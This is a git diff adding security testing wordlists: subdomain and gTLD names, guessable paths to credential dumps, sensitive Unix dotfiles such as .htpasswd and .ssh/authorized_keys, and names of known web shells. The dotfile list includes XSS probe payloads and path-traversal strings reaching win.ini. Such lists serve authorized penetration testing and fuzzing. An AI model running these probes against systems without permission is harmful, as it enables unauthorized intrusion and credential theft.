|
||||
hd
|
||||
he
|
||||
help
|
||||
helpdesk
|
||||
hera
|
||||
heracles
|
||||
hercules
|
||||
hf
|
||||
hg
|
||||
hh
|
||||
hi
|
||||
hj
|
||||
hk
|
||||
hl
|
||||
hm
|
||||
hn
|
||||
ho
|
||||
home
|
||||
homer
|
||||
hotspot
|
||||
hp
|
||||
hq
|
||||
hr
|
||||
hs
|
||||
ht
|
||||
hu
|
||||
hv
|
||||
hw
|
||||
hx
|
||||
hy
|
||||
hypernova
|
||||
hz
|
||||
i
|
||||
ia
|
||||
ib
|
||||
ic
|
||||
id
|
||||
ie
|
||||
if
|
||||
ig
|
||||
ih
|
||||
ii
|
||||
ij
|
||||
ik
|
||||
il
|
||||
im
|
||||
images
|
||||
imail
|
||||
imap
|
||||
imap3
|
||||
imap3d
|
||||
imapd
|
||||
imaps
|
||||
imgs
|
||||
imogen
|
||||
in
|
||||
inmuebles
|
||||
internal
|
||||
interno
|
||||
intranet
|
||||
io
|
||||
ip
|
||||
ip6
|
||||
ipsec
|
||||
ipv6
|
||||
iq
|
||||
ir
|
||||
irc
|
||||
ircd
|
||||
is
|
||||
isa
|
||||
it
|
||||
iu
|
||||
iv
|
||||
iw
|
||||
ix
|
||||
iy
|
||||
iz
|
||||
j
|
||||
ja
|
||||
jabber
|
||||
jb
|
||||
jc
|
||||
jd
|
||||
je
|
||||
jf
|
||||
jg
|
||||
jh
|
||||
ji
|
||||
jj
|
||||
jk
|
||||
jl
|
||||
jm
|
||||
jn
|
||||
jo
|
||||
jp
|
||||
jq
|
||||
jr
|
||||
js
|
||||
jt
|
||||
ju
|
||||
jupiter
|
||||
jv
|
||||
jw
|
||||
jx
|
||||
jy
|
||||
jz
|
||||
k
|
||||
ka
|
||||
kb
|
||||
kc
|
||||
kd
|
||||
ke
|
||||
kf
|
||||
kg
|
||||
kh
|
||||
ki
|
||||
kj
|
||||
kk
|
||||
kl
|
||||
km
|
||||
kn
|
||||
ko
|
||||
kp
|
||||
kq
|
||||
kr
|
||||
ks
|
||||
kt
|
||||
ku
|
||||
kv
|
||||
kw
|
||||
kx
|
||||
ky
|
||||
kz
|
||||
l
|
||||
la
|
||||
lab
|
||||
laboratories
|
||||
laboratorio
|
||||
laboratory
|
||||
labs
|
||||
lb
|
||||
lc
|
||||
ld
|
||||
le
|
||||
lf
|
||||
lg
|
||||
lh
|
||||
li
|
||||
library
|
||||
linux
|
||||
lisa
|
||||
lj
|
||||
lk
|
||||
ll
|
||||
lm
|
||||
ln
|
||||
lo
|
||||
localhost
|
||||
log
|
||||
login
|
||||
logon
|
||||
logs
|
||||
lp
|
||||
lq
|
||||
lr
|
||||
ls
|
||||
lt
|
||||
lu
|
||||
lv
|
||||
lw
|
||||
lx
|
||||
ly
|
||||
lz
|
||||
m
|
||||
ma
|
||||
mail
|
||||
mailgate
|
||||
manager
|
||||
marketing
|
||||
mb
|
||||
mc
|
||||
md
|
||||
me
|
||||
media
|
||||
member
|
||||
members
|
||||
mercury
|
||||
meta
|
||||
meta01
|
||||
meta02
|
||||
meta03
|
||||
meta1
|
||||
meta2
|
||||
meta3
|
||||
mf
|
||||
mg
|
||||
mh
|
||||
mi
|
||||
miembros
|
||||
minerva
|
||||
mj
|
||||
mk
|
||||
ml
|
||||
mm
|
||||
mn
|
||||
mo
|
||||
mob
|
||||
mobile
|
||||
moodle
|
||||
movil
|
||||
mp
|
||||
mq
|
||||
mr
|
||||
ms
|
||||
mssql
|
||||
mt
|
||||
mu
|
||||
mv
|
||||
mw
|
||||
mx
|
||||
mx0
|
||||
mx01
|
||||
mx02
|
||||
mx03
|
||||
mx1
|
||||
mx2
|
||||
mx3
|
||||
my
|
||||
mysql
|
||||
mz
|
||||
n
|
||||
na
|
||||
nb
|
||||
nc
|
||||
nd
|
||||
ne
|
||||
nelson
|
||||
neon
|
||||
net
|
||||
netmail
|
||||
news
|
||||
nf
|
||||
ng
|
||||
nh
|
||||
ni
|
||||
nj
|
||||
nk
|
||||
nl
|
||||
nm
|
||||
nn
|
||||
no
|
||||
novell
|
||||
np
|
||||
nq
|
||||
nr
|
||||
ns
|
||||
ns0
|
||||
ns01
|
||||
ns02
|
||||
ns03
|
||||
ns1
|
||||
ns2
|
||||
ns3
|
||||
nt
|
||||
ntp
|
||||
nu
|
||||
nv
|
||||
nw
|
||||
nx
|
||||
ny
|
||||
nz
|
||||
o
|
||||
oa
|
||||
ob
|
||||
oc
|
||||
od
|
||||
oe
|
||||
of
|
||||
og
|
||||
oh
|
||||
oi
|
||||
oj
|
||||
ok
|
||||
ol
|
||||
om
|
||||
on
|
||||
online
|
||||
oo
|
||||
op
|
||||
oq
|
||||
or
|
||||
ora
|
||||
oracle
|
||||
os
|
||||
osx
|
||||
ot
|
||||
ou
|
||||
ov
|
||||
ow
|
||||
owa
|
||||
ox
|
||||
oy
|
||||
oz
|
||||
p
|
||||
pa
|
||||
partners
|
||||
pb
|
||||
pc
|
||||
pcanywhere
|
||||
pd
|
||||
pe
|
||||
pegasus
|
||||
pendrell
|
||||
personal
|
||||
pf
|
||||
pg
|
||||
ph
|
||||
photo
|
||||
photos
|
||||
pi
|
||||
pj
|
||||
pk
|
||||
pl
|
||||
pm
|
||||
pn
|
||||
po
|
||||
pop
|
||||
pop3
|
||||
portal
|
||||
postgresql
|
||||
postman
|
||||
postmaster
|
||||
pp
|
||||
ppp
|
||||
pq
|
||||
pr
|
||||
preprod
|
||||
pre-prod
|
||||
private
|
||||
prod
|
||||
proxy
|
||||
prueba
|
||||
pruebas
|
||||
ps
|
||||
pt
|
||||
pu
|
||||
pub
|
||||
public
|
||||
pv
|
||||
pw
|
||||
px
|
||||
py
|
||||
pz
|
||||
q
|
||||
qa
|
||||
qb
|
||||
qc
|
||||
qd
|
||||
qe
|
||||
qf
|
||||
qg
|
||||
qh
|
||||
qi
|
||||
qj
|
||||
qk
|
||||
ql
|
||||
qm
|
||||
qn
|
||||
qo
|
||||
qp
|
||||
qq
|
||||
qr
|
||||
qs
|
||||
qt
|
||||
qu
|
||||
qv
|
||||
qw
|
||||
qx
|
||||
qy
|
||||
qz
|
||||
r
|
||||
ra
|
||||
ras
|
||||
rb
|
||||
rc
|
||||
rd
|
||||
re
|
||||
remote
|
||||
reports
|
||||
research
|
||||
restricted
|
||||
rf
|
||||
rg
|
||||
rh
|
||||
ri
|
||||
rj
|
||||
rk
|
||||
rl
|
||||
rm
|
||||
rn
|
||||
ro
|
||||
robinhood
|
||||
router
|
||||
rp
|
||||
rq
|
||||
rr
|
||||
rs
|
||||
rt
|
||||
rtr
|
||||
ru
|
||||
rv
|
||||
rw
|
||||
rx
|
||||
ry
|
||||
rz
|
||||
s
|
||||
sa
|
||||
sales
|
||||
sample
|
||||
samples
|
||||
sandbox
|
||||
sb
|
||||
sc
|
||||
sd
|
||||
se
|
||||
search
|
||||
secure
|
||||
seguro
|
||||
server
|
||||
services
|
||||
servicios
|
||||
servidor
|
||||
sf
|
||||
sg
|
||||
sh
|
||||
sharepoint
|
||||
shop
|
||||
shopping
|
||||
si
|
||||
sj
|
||||
sk
|
||||
sl
|
||||
sm
|
||||
sms
|
||||
smtp
|
||||
sn
|
||||
so
|
||||
socios
|
||||
solaris
|
||||
soporte
|
||||
sp
|
||||
sq
|
||||
sql
|
||||
squirrel
|
||||
squirrelmail
|
||||
sr
|
||||
ss
|
||||
ssh
|
||||
st
|
||||
staff
|
||||
staging
|
||||
stats
|
||||
su
|
||||
sun
|
||||
support
|
||||
sv
|
||||
sw
|
||||
sx
|
||||
sy
|
||||
sz
|
||||
t
|
||||
ta
|
||||
tb
|
||||
tc
|
||||
td
|
||||
te
|
||||
test
|
||||
tf
|
||||
tftp
|
||||
tg
|
||||
th
|
||||
ti
|
||||
tienda
|
||||
tj
|
||||
tk
|
||||
tl
|
||||
tm
|
||||
tn
|
||||
to
|
||||
tp
|
||||
tq
|
||||
tr
|
||||
ts
|
||||
tt
|
||||
tu
|
||||
tunnel
|
||||
tv
|
||||
tw
|
||||
tx
|
||||
ty
|
||||
tz
|
||||
u
|
||||
ua
|
||||
uat
|
||||
ub
|
||||
uc
|
||||
ud
|
||||
ue
|
||||
uf
|
||||
ug
|
||||
uh
|
||||
ui
|
||||
uj
|
||||
uk
|
||||
ul
|
||||
um
|
||||
un
|
||||
unix
|
||||
uo
|
||||
up
|
||||
upload
|
||||
uploads
|
||||
uq
|
||||
ur
|
||||
us
|
||||
ut
|
||||
uu
|
||||
uv
|
||||
uw
|
||||
ux
|
||||
uy
|
||||
uz
|
||||
v
|
||||
va
|
||||
vb
|
||||
vc
|
||||
vd
|
||||
ve
|
||||
ventas
|
||||
vf
|
||||
vg
|
||||
vh
|
||||
vi
|
||||
virtual
|
||||
vista
|
||||
vj
|
||||
vk
|
||||
vl
|
||||
vm
|
||||
vn
|
||||
vnc
|
||||
vo
|
||||
vp
|
||||
vpn
|
||||
vpn1
|
||||
vpn2
|
||||
vpn3
|
||||
vq
|
||||
vr
|
||||
vs
|
||||
vt
|
||||
vu
|
||||
vv
|
||||
vw
|
||||
vx
|
||||
vy
|
||||
vz
|
||||
w
|
||||
wa
|
||||
wap
|
||||
wb
|
||||
wc
|
||||
wd
|
||||
we
|
||||
web
|
||||
web0
|
||||
web01
|
||||
web02
|
||||
web03
|
||||
web1
|
||||
web2
|
||||
web3
|
||||
webadmin
|
||||
webct
|
||||
weblog
|
||||
webmail
|
||||
webmaster
|
||||
webmin
|
||||
wf
|
||||
wg
|
||||
wh
|
||||
wi
|
||||
win
|
||||
windows
|
||||
wj
|
||||
wk
|
||||
wl
|
||||
wm
|
||||
wn
|
||||
wo
|
||||
wp
|
||||
wq
|
||||
wr
|
||||
ws
|
||||
wt
|
||||
wu
|
||||
wv
|
||||
ww
|
||||
ww0
|
||||
ww01
|
||||
ww02
|
||||
ww03
|
||||
ww1
|
||||
ww2
|
||||
ww3
|
||||
www
|
||||
www0
|
||||
www01
|
||||
www02
|
||||
www03
|
||||
www1
|
||||
www2
|
||||
www3
|
||||
wx
|
||||
wy
|
||||
wz
|
||||
x
|
||||
xa
|
||||
xanthus
|
||||
xb
|
||||
xc
|
||||
xd
|
||||
xe
|
||||
xf
|
||||
xg
|
||||
xh
|
||||
xi
|
||||
xj
|
||||
xk
|
||||
xl
|
||||
xm
|
||||
xn
|
||||
xo
|
||||
xp
|
||||
xq
|
||||
xr
|
||||
xs
|
||||
xt
|
||||
xu
|
||||
xv
|
||||
xw
|
||||
xx
|
||||
xy
|
||||
xz
|
||||
y
|
||||
ya
|
||||
yb
|
||||
yc
|
||||
yd
|
||||
ye
|
||||
yf
|
||||
yg
|
||||
yh
|
||||
yi
|
||||
yj
|
||||
yk
|
||||
yl
|
||||
ym
|
||||
yn
|
||||
yo
|
||||
yp
|
||||
yq
|
||||
yr
|
||||
ys
|
||||
yt
|
||||
yu
|
||||
yv
|
||||
yw
|
||||
yx
|
||||
yy
|
||||
yz
|
||||
z
|
||||
za
|
||||
zb
|
||||
zc
|
||||
zd
|
||||
ze
|
||||
zeus
|
||||
zf
|
||||
zg
|
||||
zh
|
||||
zi
|
||||
zj
|
||||
zk
|
||||
zl
|
||||
zm
|
||||
zn
|
||||
zo
|
||||
zp
|
||||
zq
|
||||
zr
|
||||
zs
|
||||
zt
|
||||
zu
|
||||
zv
|
||||
zw
|
||||
zx
|
||||
zy
|
||||
zz
|
784
discovery/dns/gTLD.txt
Normal file
784
discovery/dns/gTLD.txt
Normal file
|
@ -0,0 +1,784 @@
|
|||
한국
|
||||
테스트
|
||||
ABB
|
||||
ABBOTT
|
||||
ABOGADO
|
||||
academy
|
||||
ACCENTURE
|
||||
ACCOUNTANT
|
||||
accountants
|
||||
ACCOUNTANTS
|
||||
ACTIVE
|
||||
actor
|
||||
ADS
|
||||
ADULT
|
||||
aero
|
||||
AFL
|
||||
agency
|
||||
AIG
|
||||
airforce
|
||||
AIRFORCE
|
||||
ALLFINANZ
|
||||
ALSACE
|
||||
AMSTERDAM
|
||||
ANDROID
|
||||
APARTMENTS
|
||||
AQUARELLE
|
||||
archi
|
||||
ARMY
|
||||
arpa
|
||||
asia
|
||||
associates
|
||||
ASSOCIATES
|
||||
ATTORNEY
|
||||
AUCTION
|
||||
audio
|
||||
AUDIO
|
||||
AUTO
|
||||
AUTOS
|
||||
axa
|
||||
BAND
|
||||
BANK
|
||||
bar
|
||||
BARCLAYCARD
|
||||
BARCLAYS
|
||||
bargains
|
||||
BAUHAUS
|
||||
bayern
|
||||
BAYERN
|
||||
BBC
|
||||
BBVA
|
||||
beer
|
||||
BEER
|
||||
berlin
|
||||
best
|
||||
BIBLE
|
||||
bid
|
||||
bike
|
||||
BINGO
|
||||
BIO
|
||||
biz
|
||||
black
|
||||
blackfriday
|
||||
BLACKFRIDAY
|
||||
BLOOMBERG
|
||||
blue
|
||||
BMW
|
||||
BNPPARIBAS
|
||||
BOATS
|
||||
BOND
|
||||
BOO
|
||||
boutique
|
||||
BRIDGESTONE
|
||||
BROKER
|
||||
BROTHER
|
||||
BRUSSELS
|
||||
BUDAPEST
|
||||
build
|
||||
builders
|
||||
BUSINESS
|
||||
buzz
|
||||
BZH
|
||||
cab
|
||||
CAFE
|
||||
CAL
|
||||
camera
|
||||
camp
|
||||
CANCERRESEARCH
|
||||
CANON
|
||||
CAPETOWN
|
||||
capital
|
||||
CAPITAL
|
||||
CARAVAN
|
||||
cards
|
||||
care
|
||||
CARE
|
||||
career
|
||||
CAREER
|
||||
careers
|
||||
CARS
|
||||
CARTIER
|
||||
CASA
|
||||
cash
|
||||
CASH
|
||||
CASINO
|
||||
cat
|
||||
catering
|
||||
CBN
|
||||
center
|
||||
ceo
|
||||
CERN
|
||||
CFA
|
||||
CFD
|
||||
CHANNEL
|
||||
CHAT
|
||||
cheap
|
||||
CHLOE
|
||||
christmas
|
||||
CHROME
|
||||
church
|
||||
CHURCH
|
||||
CISCO
|
||||
citic
|
||||
CITIC
|
||||
CITY
|
||||
claims
|
||||
CLAIMS
|
||||
cleaning
|
||||
CLICK
|
||||
clinic
|
||||
CLINIC
|
||||
clothing
|
||||
club
|
||||
COACH
|
||||
codes
|
||||
coffee
|
||||
college
|
||||
COLLEGE
|
||||
cologne
|
||||
com
|
||||
community
|
||||
company
|
||||
computer
|
||||
construction
|
||||
CONSULTING
|
||||
contractors
|
||||
cooking
|
||||
cool
|
||||
coop
|
||||
CORSICA
|
||||
country
|
||||
COUPONS
|
||||
COURSES
|
||||
credit
|
||||
CREDIT
|
||||
creditcard
|
||||
CREDITCARD
|
||||
CRICKET
|
||||
CRS
|
||||
cruises
|
||||
CUISINELLA
|
||||
CYMRU
|
||||
CYOU
|
||||
DABUR
|
||||
DAD
|
||||
dance
|
||||
DATE
|
||||
dating
|
||||
DATSUN
|
||||
DAY
|
||||
DCLK
|
||||
DEALS
|
||||
DEGREE
|
||||
DELIVERY
|
||||
democrat
|
||||
dental
|
||||
DENTAL
|
||||
DENTIST
|
||||
desi
|
||||
DESI
|
||||
DESIGN
|
||||
DEV
|
||||
diamonds
|
||||
DIET
|
||||
digital
|
||||
DIGITAL
|
||||
DIRECT
|
||||
directory
|
||||
discount
|
||||
DISCOUNT
|
||||
DOCS
|
||||
DOG
|
||||
DOHA
|
||||
domains
|
||||
DOOSAN
|
||||
DOWNLOAD
|
||||
DURBAN
|
||||
DVAG
|
||||
EARTH
|
||||
EAT
|
||||
edu
|
||||
education
|
||||
email
|
||||
EMERCK
|
||||
ENERGY
|
||||
ENGINEER
|
||||
engineering
|
||||
ENGINEERING
|
||||
enterprises
|
||||
EPSON
|
||||
equipment
|
||||
ERNI
|
||||
ESQ
|
||||
estate
|
||||
EUROVISION
|
||||
eus
|
||||
EUS
|
||||
events
|
||||
EVERBANK
|
||||
exchange
|
||||
EXCHANGE
|
||||
expert
|
||||
exposed
|
||||
EXPRESS
|
||||
fail
|
||||
FAIL
|
||||
FAITH
|
||||
FAN
|
||||
FANS
|
||||
farm
|
||||
FASHION
|
||||
feedback
|
||||
FEEDBACK
|
||||
FILM
|
||||
finance
|
||||
FINANCE
|
||||
financial
|
||||
FINANCIAL
|
||||
FIRMDALE
|
||||
fish
|
||||
fishing
|
||||
FIT
|
||||
fitness
|
||||
FITNESS
|
||||
flights
|
||||
florist
|
||||
FLOWERS
|
||||
FLSMIDTH
|
||||
FLY
|
||||
foo
|
||||
FOO
|
||||
FOOTBALL
|
||||
FOREX
|
||||
FORSALE
|
||||
foundation
|
||||
FRL
|
||||
frogans
|
||||
FROGANS
|
||||
fund
|
||||
FUND
|
||||
furniture
|
||||
FURNITURE
|
||||
futbol
|
||||
FYI
|
||||
gal
|
||||
GAL
|
||||
gallery
|
||||
GARDEN
|
||||
GBIZ
|
||||
GDN
|
||||
GENT
|
||||
GGEE
|
||||
gift
|
||||
GIFTS
|
||||
GIVES
|
||||
glass
|
||||
GLE
|
||||
GLOBAL
|
||||
globo
|
||||
GLOBO
|
||||
GMAIL
|
||||
gmo
|
||||
GMO
|
||||
GMX
|
||||
GOLD
|
||||
GOLDPOINT
|
||||
GOLF
|
||||
GOO
|
||||
GOOG
|
||||
GOOGLE
|
||||
gop
|
||||
GOP
|
||||
gov
|
||||
graphics
|
||||
gratis
|
||||
GRATIS
|
||||
GREEN
|
||||
gripe
|
||||
GRIPE
|
||||
GUGE
|
||||
guide
|
||||
GUIDE
|
||||
guitars
|
||||
guru
|
||||
HAMBURG
|
||||
HANGOUT
|
||||
haus
|
||||
HEALTHCARE
|
||||
HELP
|
||||
HERE
|
||||
HERMES
|
||||
hiphop
|
||||
HIPHOP
|
||||
HITACHI
|
||||
HIV
|
||||
HOCKEY
|
||||
holdings
|
||||
holiday
|
||||
HOMEDEPOT
|
||||
HOMES
|
||||
HONDA
|
||||
horse
|
||||
HOST
|
||||
HOSTING
|
||||
house
|
||||
HOW
|
||||
IBM
|
||||
ICBC
|
||||
ICU
|
||||
IFM
|
||||
IMMO
|
||||
immobilien
|
||||
industries
|
||||
INFINITI
|
||||
info
|
||||
ING
|
||||
institute
|
||||
insure
|
||||
INSURE
|
||||
int
|
||||
international
|
||||
investments
|
||||
INVESTMENTS
|
||||
IRISH
|
||||
IWC
|
||||
JAVA
|
||||
JCB
|
||||
jetzt
|
||||
JEWELRY
|
||||
JLL
|
||||
jobs
|
||||
JOBURG
|
||||
juegos
|
||||
JUEGOS
|
||||
kaufen
|
||||
KDDI
|
||||
kim
|
||||
kitchen
|
||||
kiwi
|
||||
koeln
|
||||
KOMATSU
|
||||
KRD
|
||||
kred
|
||||
KYOTO
|
||||
LACAIXA
|
||||
land
|
||||
LAT
|
||||
LATROBE
|
||||
LAWYER
|
||||
LDS
|
||||
lease
|
||||
LEASE
|
||||
LECLERC
|
||||
LEGAL
|
||||
LGBT
|
||||
LIAISON
|
||||
LIDL
|
||||
life
|
||||
LIFE
|
||||
lighting
|
||||
limited
|
||||
LIMITED
|
||||
limo
|
||||
link
|
||||
LOAN
|
||||
loans
|
||||
LOANS
|
||||
LOL
|
||||
london
|
||||
LOTTE
|
||||
LOTTO
|
||||
LOVE
|
||||
LTDA
|
||||
LUPIN
|
||||
luxe
|
||||
LUXE
|
||||
luxury
|
||||
MADRID
|
||||
MAIF
|
||||
management
|
||||
mango
|
||||
MARKET
|
||||
marketing
|
||||
MARKETS
|
||||
MARRIOTT
|
||||
MBA
|
||||
media
|
||||
MEDIA
|
||||
meet
|
||||
MELBOURNE
|
||||
MEME
|
||||
MEMORIAL
|
||||
MEN
|
||||
menu
|
||||
miami
|
||||
mil
|
||||
MINI
|
||||
MMA
|
||||
mobi
|
||||
moda
|
||||
moe
|
||||
monash
|
||||
MONEY
|
||||
MORMON
|
||||
MORTGAGE
|
||||
moscow
|
||||
MOSCOW
|
||||
MOTORCYCLES
|
||||
MOV
|
||||
MOVIE
|
||||
MTN
|
||||
MTPC
|
||||
museum
|
||||
NADEX
|
||||
nagoya
|
||||
name
|
||||
NAVY
|
||||
NEC
|
||||
net
|
||||
NETWORK
|
||||
neustar
|
||||
NEW
|
||||
NEWS
|
||||
NEXUS
|
||||
NGO
|
||||
NHK
|
||||
NICO
|
||||
ninja
|
||||
NISSAN
|
||||
NRA
|
||||
NRW
|
||||
NTT
|
||||
nyc
|
||||
okinawa
|
||||
ONE
|
||||
ONG
|
||||
onl
|
||||
ONLINE
|
||||
OOO
|
||||
ORACLE
|
||||
org
|
||||
ORGANIC
|
||||
OSAKA
|
||||
OTSUKA
|
||||
OVH
|
||||
PAGE
|
||||
PANERAI
|
||||
paris
|
||||
PARIS
|
||||
partners
|
||||
parts
|
||||
PARTY
|
||||
PHARMACY
|
||||
PHILIPS
|
||||
photo
|
||||
photography
|
||||
photos
|
||||
PHYSIO
|
||||
PIAGET
|
||||
pics
|
||||
PICTET
|
||||
pictures
|
||||
PICTURES
|
||||
pink
|
||||
PIZZA
|
||||
PLACE
|
||||
plumbing
|
||||
PLUS
|
||||
POHL
|
||||
POKER
|
||||
PORN
|
||||
post
|
||||
PRAXI
|
||||
PRESS
|
||||
pro
|
||||
PROD
|
||||
productions
|
||||
PROF
|
||||
properties
|
||||
PROPERTY
|
||||
pub
|
||||
qpon
|
||||
quebec
|
||||
QUEBEC
|
||||
RACING
|
||||
REALTOR
|
||||
recipes
|
||||
red
|
||||
REDSTONE
|
||||
REHAB
|
||||
REISE
|
||||
reisen
|
||||
REISEN
|
||||
REIT
|
||||
ren
|
||||
RENT
|
||||
rentals
|
||||
repair
|
||||
report
|
||||
REPUBLICAN
|
||||
rest
|
||||
REST
|
||||
RESTAURANT
|
||||
REVIEW
|
||||
reviews
|
||||
rich
|
||||
RIO
|
||||
RIP
|
||||
rocks
|
||||
ROCKS
|
||||
rodeo
|
||||
RSVP
|
||||
ruhr
|
||||
RUN
|
||||
ryukyu
|
||||
RYUKYU
|
||||
saarland
|
||||
SAARLAND
|
||||
SALE
|
||||
SAMSUNG
|
||||
SANDVIK
|
||||
SANDVIKCOROMANT
|
||||
SAP
|
||||
SARL
|
||||
SAXO
|
||||
SCA
|
||||
SCB
|
||||
SCHMIDT
|
||||
SCHOLARSHIPS
|
||||
SCHOOL
|
||||
schule
|
||||
SCHULE
|
||||
SCHWARZ
|
||||
SCIENCE
|
||||
SCOT
|
||||
SEAT
|
||||
SENER
|
||||
services
|
||||
SERVICES
|
||||
SEW
|
||||
SEX
|
||||
sexy
|
||||
shiksha
|
||||
shoes
|
||||
SHOW
|
||||
SHRIRAM
|
||||
singles
|
||||
SITE
|
||||
SKI
|
||||
SKY
|
||||
SOCCER
|
||||
social
|
||||
SOFTWARE
|
||||
sohu
|
||||
solar
|
||||
solutions
|
||||
SONY
|
||||
soy
|
||||
SOY
|
||||
SPACE
|
||||
SPIEGEL
|
||||
SPREADBETTING
|
||||
STUDY
|
||||
STYLE
|
||||
SUCKS
|
||||
supplies
|
||||
supply
|
||||
support
|
||||
SURF
|
||||
surgery
|
||||
SURGERY
|
||||
SUZUKI
|
||||
SWISS
|
||||
SYDNEY
|
||||
systems
|
||||
TAIPEI
|
||||
TATAR
|
||||
tattoo
|
||||
tax
|
||||
TAX
|
||||
TAXI
|
||||
TEAM
|
||||
TECH
|
||||
technology
|
||||
tel
|
||||
TEMASEK
|
||||
TENNIS
|
||||
THD
|
||||
THEATER
|
||||
TICKETS
|
||||
tienda
|
||||
tips
|
||||
TIRES
|
||||
TIROL
|
||||
today
|
||||
tokyo
|
||||
tools
|
||||
TOP
|
||||
TORAY
|
||||
TOSHIBA
|
||||
TOURS
|
||||
town
|
||||
TOWN
|
||||
toys
|
||||
TOYS
|
||||
trade
|
||||
TRADING
|
||||
training
|
||||
travel
|
||||
TRUST
|
||||
TUI
|
||||
university
|
||||
UNIVERSITY
|
||||
uno
|
||||
UOL
|
||||
vacations
|
||||
vegas
|
||||
ventures
|
||||
vermögensberater
|
||||
vermögensberatung
|
||||
VERSICHERUNG
|
||||
VET
|
||||
viajes
|
||||
VIDEO
|
||||
villas
|
||||
vision
|
||||
VLAANDEREN
|
||||
vodka
|
||||
vote
|
||||
voting
|
||||
voto
|
||||
voyage
|
||||
WALES
|
||||
WALTER
|
||||
wang
|
||||
watch
|
||||
webcam
|
||||
WEBSITE
|
||||
wed
|
||||
WEDDING
|
||||
WEIR
|
||||
WHOSWHO
|
||||
wien
|
||||
wiki
|
||||
WILLIAMHILL
|
||||
WIN
|
||||
WME
|
||||
WORK
|
||||
works
|
||||
WORLD
|
||||
wtc
|
||||
WTC
|
||||
wtf
|
||||
WTF
|
||||
XBOX
|
||||
XEROX
|
||||
XIN
|
||||
xn--30rr7y
|
||||
xn--45q11c
|
||||
xn--9et52u
|
||||
xn--b4w605ferd
|
||||
xn--czrs0t
|
||||
xn--estv75g
|
||||
xn--fjq720a
|
||||
xn--flw351e
|
||||
xn--hxt814e
|
||||
xn--imr513n
|
||||
xn--kcrx77d1x4a
|
||||
xn--mgbpl2fh
|
||||
xn--mxtq1m
|
||||
xn--nyqy26a
|
||||
xn--qcka1pmc
|
||||
xn--vuq861b
|
||||
xn--y9a3aq
|
||||
xxx
|
||||
xyz
|
||||
YACHTS
|
||||
YANDEX
|
||||
YODOBASHI
|
||||
YOGA
|
||||
yokohama
|
||||
YOKOHAMA
|
||||
YOUTUBE
|
||||
ZIP
|
||||
zone
|
||||
ZUERICH
|
||||
إختبار
|
||||
ایران
|
||||
آزمایشی
|
||||
الاردن
|
||||
الجزائر
|
||||
السعودية
|
||||
المغرب
|
||||
امارات
|
||||
بھارت
|
||||
بازار
|
||||
پاکستان
|
||||
تونس
|
||||
سودان
|
||||
سورية
|
||||
شبكة
|
||||
عمان
|
||||
فلسطين
|
||||
قطر
|
||||
مصر
|
||||
مليسيا
|
||||
موقع
|
||||
טעסט
|
||||
δοκιμή
|
||||
дети
|
||||
испытание
|
||||
қаз
|
||||
мкд
|
||||
мон
|
||||
москва
|
||||
онлайн
|
||||
орг
|
||||
рус
|
||||
рф
|
||||
сайт
|
||||
срб
|
||||
укр
|
||||
გე
|
||||
परीक्षा
|
||||
भारत
|
||||
संगठन
|
||||
ભારત
|
||||
భారత్
|
||||
ਭਾਰਤ
|
||||
இந்தியா
|
||||
இலங்கை
|
||||
சிங்கப்பூர்
|
||||
பரிட்சை
|
||||
বাংলা
|
||||
ভারত
|
||||
ලංකා
|
||||
世界
|
||||
中信
|
||||
中国
|
||||
中國
|
||||
中文网
|
||||
企业
|
||||
佛山
|
||||
公司
|
||||
公益
|
||||
台湾
|
||||
台灣
|
||||
商城
|
||||
商标
|
||||
在线
|
||||
广东
|
||||
我爱你
|
||||
手机
|
||||
政务
|
||||
新加坡
|
||||
机构
|
||||
测试
|
||||
測試
|
||||
游戏
|
||||
移动
|
||||
组织机构
|
||||
网址
|
||||
网络
|
||||
集团
|
||||
香港
|
2346
discovery/predictable-filepaths/KitchensinkDirectories.txt
Normal file
2346
discovery/predictable-filepaths/KitchensinkDirectories.txt
Normal file
File diff suppressed because it is too large
Load diff
24
discovery/predictable-filepaths/Randomfiles.txt
Normal file
24
discovery/predictable-filepaths/Randomfiles.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
/accounts.txt
|
||||
/culeadora.txt
|
||||
/data.txt
|
||||
/database.txt
|
||||
/grabbed.html
|
||||
/info.txt
|
||||
/l0gs.txt
|
||||
/log.txt
|
||||
/logins.txt
|
||||
/logs.txt
|
||||
/members.txt
|
||||
/pass.txt
|
||||
/passes.txt
|
||||
/password.html
|
||||
/password.txt
|
||||
/passwords.html
|
||||
/passwords.txt
|
||||
/pazz.txt
|
||||
/pazzezs.txt
|
||||
/pw.txt
|
||||
/pws.txt
|
||||
/technico.txt
|
||||
/usernames.txt
|
||||
/users.txt
|
51
discovery/predictable-filepaths/UnixDotfiles.txt
Normal file
51
discovery/predictable-filepaths/UnixDotfiles.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
/.DS_Store
|
||||
/.FBCIndex
|
||||
/.access
|
||||
/.addressbook
|
||||
/.bash_history
|
||||
/.bashrc
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
|
||||
/.cobalt/sysManage/../admin/.htaccess
|
||||
/.fhp
|
||||
/.forward
|
||||
/.history
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.lynx_cookies
|
||||
/.mysql_history
|
||||
/.nsconfig
|
||||
/.nsf/../winnt/win.ini
|
||||
/.passwd
|
||||
/.perf
|
||||
/.pinerc
|
||||
/.plan
|
||||
/.proclog
|
||||
/.procmailrc
|
||||
/.profile
|
||||
/.psql_history
|
||||
/.rhosts
|
||||
/.sh_history
|
||||
/.ssh
|
||||
/.ssh/authorized_keys
|
||||
/.ssh/known_hosts
|
||||
/.www_acl
|
||||
/.wwwacl
|
||||
/.access
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
|
||||
/.fhp
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.nsconfig
|
||||
/.passwd
|
||||
/.www_acl
|
||||
/.wwwacl
|
|
@ -0,0 +1,29 @@
|
|||
3fexe.asp
|
||||
ASpy.asp
|
||||
EFSO.asp
|
||||
RemExp.asp
|
||||
aspxSH.asp
|
||||
aspxshell.aspx
|
||||
aspydrv.asp
|
||||
cmd.asp
|
||||
cmd.aspx
|
||||
cmdexec.aspx
|
||||
elmaliseker.asp
|
||||
filesystembrowser.aspx
|
||||
